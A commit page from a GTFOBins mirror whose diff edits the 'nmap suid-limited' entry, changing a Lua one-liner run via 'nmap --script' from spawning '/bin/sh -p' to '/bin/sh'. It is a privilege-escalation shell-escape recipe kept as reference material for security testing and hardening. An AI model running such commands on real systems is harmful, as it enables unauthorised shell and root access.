mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 22:40:10 +01:00
Fix nmap suid-limited
This commit is contained in:
parent
8fb329ca92
commit
e84ec807a1
@ -86,6 +86,6 @@ functions:
|
||||
- description: Input echo is disabled.
|
||||
code: |
|
||||
TF=$(mktemp)
|
||||
echo 'os.execute("/bin/sh -p")' > $TF
|
||||
echo 'os.execute("/bin/sh")' > $TF
|
||||
./nmap --script=$TF
|
||||
---
|
||||
|
Loading…
Reference in New Issue
Block a user